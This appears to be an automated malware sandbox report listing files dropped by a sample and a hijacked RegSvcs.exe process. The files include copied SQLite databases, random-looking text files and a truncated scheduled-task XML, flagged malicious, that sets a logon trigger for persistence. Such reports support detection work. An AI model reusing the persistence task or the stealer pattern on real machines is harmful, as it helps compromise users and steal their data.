                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp1367.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp1378.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp1398.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp13A9.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp2070.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):98304
                                                                      Entropy (8bit):0.08235737944063153
                                                                      Encrypted:false
                                                                      SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                      MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                      SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                      SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                      SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp25D7.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp25E8.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp2608.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp2619.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                      Category:dropped
                                                                      Size (bytes):106496
                                                                      Entropy (8bit):1.1373607036346451
                                                                      Encrypted:false
                                                                      SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c9G/k4:MnlyfnGtxnfVuSVumEHUM4
                                                                      MD5:64BCCF32ED2142E76D142DF7AAC75730
                                                                      SHA1:30AB1540F7909BEE86C0542B2EBD24FB73E5D629
                                                                      SHA-256:B274913369030CD83E1C76E8D486F501E349D067824C6A519F2DAB378AD0CC09
                                                                      SHA-512:0C2B4FC0D38F97C8411E1541AB15B78C57FEA370F02C17F8CB26101A936F19E636B02AF1DF2A62C8EAEE6B785FE17879E2723D8618C9C3C8BD11EB943BA7AB31
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp2629.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp263A.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                      Category:dropped
                                                                      Size (bytes):51200
                                                                      Entropy (8bit):0.8746135976761988
                                                                      Encrypted:false
                                                                      SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                      MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                      SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                      SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                      SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                      Malicious:false
                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                      C:\Users\user\AppData\Local\Temp\tmp2CA3.tmp

                                                                      Download File
                                                                      Process:C:\Users\user\Desktop\13P2mxLaQk.exe
                                                                      File Type:XML 1.0 document, ASCII text
                                                                      Category:dropped
                                                                      Size (bytes):1583
                                                                      Entropy (8bit):5.116948366756834
                                                                      Encrypted:false
                                                                      SSDEEP:24:2di4+S2qhtJ12iy1mcrUnrKMhEMOFGpwOzNgU3ODOiIQRvh7hwrgXuNtjH+xvn:cgeLAYrFdOFzOzN33ODOiDdKrsuTTyv
                                                                      MD5:22D047822BA2A06D0C8CCA257E122C85
                                                                      SHA1:EC12B5B3EA1A2D69E500C9C963C9C8370B3CAFAF
                                                                      SHA-256:D4051FBAE814F378F47D44D7C1021A6D4167946CE5767071461554DC7DF6FB15
                                                                      SHA-512:49D1B177CDD726426875BD03115C6EFA438853489FC48BA3C94F309B3F6EA9203D97C8038628C2A2B9E7BDB5C4B4074D58ABAE3CB0FFE77C17ACFEDE9C6C0640
                                                                      Malicious:true
                                                                      Preview:<?xml version="1.0" encoding="UTF-16"?>.<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">. <RegistrationInfo>. <Date>2014-10-25T14:27:44.8929027</Date>. <Author>user-PC\user</Author>. </RegistrationInfo>. <Triggers>. <LogonTrigger>. <Enabled>true</Enabled>. <UserId>user-PC\user</UserId>. </LogonTrigger>. <RegistrationTrigger>. <Enabled>false</Enabled>. </RegistrationTrigger>. </Triggers>. <Principals>. <Principal id="Author">. <UserId>user-PC\user</UserId>. <LogonType>InteractiveToken</LogonType>. <RunLevel>LeastPrivilege</RunLevel>. </Principal>. </Principals>. <Settings>. <MultipleInstancesPolicy>StopExisting</MultipleInstancesPolicy>. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>. <StopIfGoingOnBatteries>true</StopIfGoingOnBatteries>. <AllowHardTerminate>false</AllowHardTerminate>. <StartWhenAvailable>true</StartWhenAvailable>. <RunOnlyIfNetwor

                                                                      C:\Users\user\AppData\Local\Temp\tmp30D9.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.701188456968639
                                                                      Encrypted:false
                                                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                      Malicious:false
                                                                      Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                                      C:\Users\user\AppData\Local\Temp\tmp3157.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.698193102830694
                                                                      Encrypted:false
                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                      Malicious:false
                                                                      Preview:LSBIHQFDVTSVVGEDSWPTOHLTEVYTSYUFESYWTQBFWWMHNBBEMBVMOFMZTMOHDQNCKKHKYRTCMCFSQHGYBSVKMOQQLLCPQZHKDOPBFGDVPYZVWAADJMJUDTGESJIJSIQZHWSKSIHTTLYRSZAUESRQOTVVODESFYDOSXVOSTUCUVRNFBAMHCVWDUZQFCHRONJGZADAUMSGTNUNYSJEYNAJVNHGNGEKEHFUHSWMPSTLDYTFLOUMEMBIOUMUQYVMXXUSQSJYMKPGRXNZNRQHYVNDPSJDMHHNJONALSNANDEAVHLRUPZWQZSUYKUNRGQKLVUFPNDCKWWBQHGNPLZWXZSMUEQMMVQATLEMDSGIBYTRQPDWMWCCPYAGXWODOAEXALYTURUVPQJZXUJNOZGFZASLIHIVVBQZYVLEIKGCCPNMMGMIBNZIGEAQZMKNAFRLUXOVVSCZFIZNIPVFFBXOTERXCQGMZIJJKDCRYFXCYFAPTPKLXEFWZKTOELZUOLCVEONVZUAOJTZVWUJWFPFUDVPHTTGKXHDSORYETAETDBZAWMPROUKXLMNPWEGGSTJGSGHJQEGHMKRIVKCSQQGLVWFOIBALTKZNZJKTVRHAUXODFVCAVHPPOMBIWHOJVPZHSRBNBWYKRTOJBZPFGIYJCKLLAKNNAOGERLLVXJLHSWDWQWYHKSOFVCMZYBNMNLGPJOILDGZXVYEWKJBWZQHSWDZWSZLBQIBWYRMMXSCPZOJNGUIEEGKJNLYCUVISYUKUZGGZJDVPNOYOFMAODKVQWRASSESZPGLAOUYYCSGNALLRLRODYFLJIZINLFQABYEGICCVXPUWRNWLWBEOBPSPLAWNUWCLXTGHIRGLZZTTJLXIYMCQWBYXIFLVPGIWZEPOQQLQCCZQTITKAMQMYEMNRHVDWXFLMRDFHDTFKTGYONHYUGKCISPDNCPWHZCRMEJKHTUBTLHNJJVOYIWLKBNFOTHVXQJRGQARLJFNBAJTTVFM

                                                                      C:\Users\user\AppData\Local\Temp\tmp3177.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.702263764575455
                                                                      Encrypted:false
                                                                      SSDEEP:24:QUkKzRRr64jMMhcqBDi9yWJqsBFhli3VZ6i0:QUkCe4j/hI9yWJnvi3Vf0
                                                                      MD5:1680F18135FD9FE517865D4B70BCA69F
                                                                      SHA1:CE72CFB81AB690709C2C5BBF40348F829C87813B
                                                                      SHA-256:0F4384BA6CC62588912ACEBE97E6E00A03D1145AFAF38BDE22023CA303B22CA0
                                                                      SHA-512:E63A46F382399DE9A52F82325302CCFF8184246D4A126EDCC98283B6CBC77D4330A01A704BA4E29144A2A37D6E06F9AF22383A00ACC2394E827DC97748171585
                                                                      Malicious:false
                                                                      Preview:ZQIXMVQGAHDITDJZGGBRVMLECQSWORTZSLVRPVEGPWPVZTSCUAAOZEHEMQBFXYQHAHJZSDLBFWCHSGHULCPYSYSQXRZJWEBIQXUUBQWRWTEIEYXQNQSWSIFSZRCKKPIEMFCPWGUCQQMTSHZBSZVTRBPCPEJUOTTXWFTZMIACKGYGCKGMCSBDEWSYMPFVNOOLZEARTYUPCWTOBACIPWHFPWORDPLQMNLMUZNAKOQVSKHKIFLPCYEHDDRRDQOYCYQVULYYOTKIZPSPBGJRCSTMNKECWGATNMXDLHHCEVMIAXORCUUBFYRDSANZMOGABCQIQLFHTBGKKNPDKITRXVRKSKNVGMYCWRZQDVIMHLJLZRTYAAEHTNREDULDCWBSZMMNIANUNAFOGWCASXNKHREAUCUWLFKPTBHSSBGWNPWTUBBQMZWBLBJUGDBYRIMWQJRPSOWJXAJGBKZNEPJRNRYUSGQVPTEMKUOEFNAJOSUDQYVKPUJCZGEGCSKJLVBNJUHWENWOTATKRZDPPHLZRTEDRFFPOSXJYWZGCANYHHLHXXVTSSYPKKRRPYFRZWPUNTSEFRSCUYISMVFYBIPXTBGXLELYMXPWVIFHICARYLACSUYONWBWTORCZTHJFSTTFVOFCJFCNAETZOVMYJPCQMLJESIRJYXODJQXZDNJABIYMTRLKATOAVVXTUZSVSRMUIPQSCLFLDHXPUIRKARFNWIVJCRHDPDVWJMVIMIYEVDEIYZXDMZFAKSSTYCAXXIWXKFLTNQLSXXZMPIQZYDSHVASWFVUHVXSYXSNAYZOGEQZXYDMZBHUZSYGXGRDAZTEOKPXEATMDEMGOQLFIBNDPAXRWXZXMBHAXSODDRKSUOGIMMNADLIRGHDFDTKKQAFWAYTUNQJNECGAKAPULJFXENSHPMQGUWBJJTPVTDADKCEVKGQOXSCANLNQNJAWKDBVBIWICEASXDEHDCNCUIOBUKTINVKEPNITJZRLWNHBVANB

                                                                      C:\Users\user\AppData\Local\Temp\tmp3178.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.701188456968639
                                                                      Encrypted:false
                                                                      SSDEEP:24:hm3LKgBsTCBI602KGM6Fnd0F02s0LTz4+A7wXBjb9gPY14fmfdBH159l7TZzRQTJ:4mg9IFPGM6OtPc++wXBbV14e71zwv
                                                                      MD5:18A3248DC9C539CCD2C8419D200F1C4D
                                                                      SHA1:3B2CEE87F3426C4A08959E9861D274663420215C
                                                                      SHA-256:27D6BAB3FFA19534FF008BDBC5FF07BE94BA08C909222D5AD4802C4C9E10153E
                                                                      SHA-512:F8176C814016D4962693A55A84D2BCC26EE01DE822E76B3D3A6B0ADD48382F8D76B5576742BBCAD16A7779C602B435150C0EBDDE1B1ECBFFD6702ECEFE87133B
                                                                      Malicious:false
                                                                      Preview:GAOBCVIQIJEAUPWDPRZCCBNOLIBVRPPLZPNDXMXWAHTVVUJJRUSFIWRMMSRKOQHCYSYUBMSXZLUDXPNKIPJHNLIKYINEELPXFAGZSNBZUDCHHIXCDHGYSSWPBQTJTTGUSVAKXUCDJBHFKRHEGHIIDQIBNMNBPTCUQXVDKMCQLDDYJEQLPYWFIVRSVCHHZMWWVQSPTEOWKFBQOCSQTIVDEMIEGVVFLVGTQYKHFAQIQIDWGOQCFBYXUBCCAADXTEQWFNWFUUEWWCZWKOPSJAPHFWQQPXLGACJBTIMAPLNZIUQMQYDMTEGLQKPQSZAOUAAZHEFQNKZLRIVEYLQBXOYRAYPVETHTPJWTKBAQMFVCQHILYBXXCIJUSRNECDEBAPQPACKYMONEQAVFVJSLJHMSFLODHAMDEOOQLMHKTRONKXRUSJGZNIPSFDBPUGOOQDGXVUMBHIHMJBJURQUZFOGURXHYACJUXKOHRQKRDYOEUCWNOZMYOMEIECSMGRXADFNSGHNEYHTEUZESWUPBBTWHMAAHATGKEMQJZGUKFHMOPJNWIZHMNPENYBXIYIQQAAAPIDUTGVYULURYREYTCNKILPPERQGQZJOXIUVLLDJBKFXUJTGVBMXJXFCOCDEASKYTKWQYKXJPQPYIMVFTRDRIZGWDHSNPUPGXIZLQHXDLMDNRJWXSZBGUTMSTDCUAYDTGXGFEGTPPNOUDQYIUIRVWYSBPWRTNAHWZOJNZBMFUMOBETTVAJIKGCUOZZNFQXGHJMEETOIEJZISKBKYAFTPYJUBCNCNXVOJQLDZBVOEERMNSHPDRPHBKXUPBSMXTNRSKCXXOGLQOGPAAXIHATAVXMPGBBSIKATHNAZZHCOKHGTBSCMZLDTZSIPNGBQAQVBLOEZNNOCGBGKUDVAVPXMJZWAFTYFQUZALBMQWWTFBKYRIAXMCLPBVGGEVXGVKQOKGLWBYOFWLKNSBXJMTWCKOJNEQGGGMZAEJRHKRITMKM

                                                                      C:\Users\user\AppData\Local\Temp\tmp3189.tmp

                                                                      Download File
                                                                      Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                      File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                      Category:dropped
                                                                      Size (bytes):1026
                                                                      Entropy (8bit):4.698193102830694
                                                                      Encrypted:false
                                                                      SSDEEP:24:KhE228cmFkr20OAjI3miuGa+rJj0c5MpHs17/w:KhLpN0OAjI3mjGaSN0c5oqzw
                                                                      MD5:78472D7E4F5450A7EA86F47D75E55F39
                                                                      SHA1:D107CE158C547BA6E7FBA95479B375AA3E5A9DA9
                                                                      SHA-256:2E1C76361DFADCE9DB785153CC20DB121B8667BE1554EB59258F8B4507170147
                                                                      SHA-512:D556587AF39CFD879A7D698B11DC51C7B733CC7C971EBE165A0A238B623BE60EB4979101E6B167EE4D25578DE2CAEBE85063AF01C1E94F56A0E3DE811D2454FD
                                                                      Malicious:false
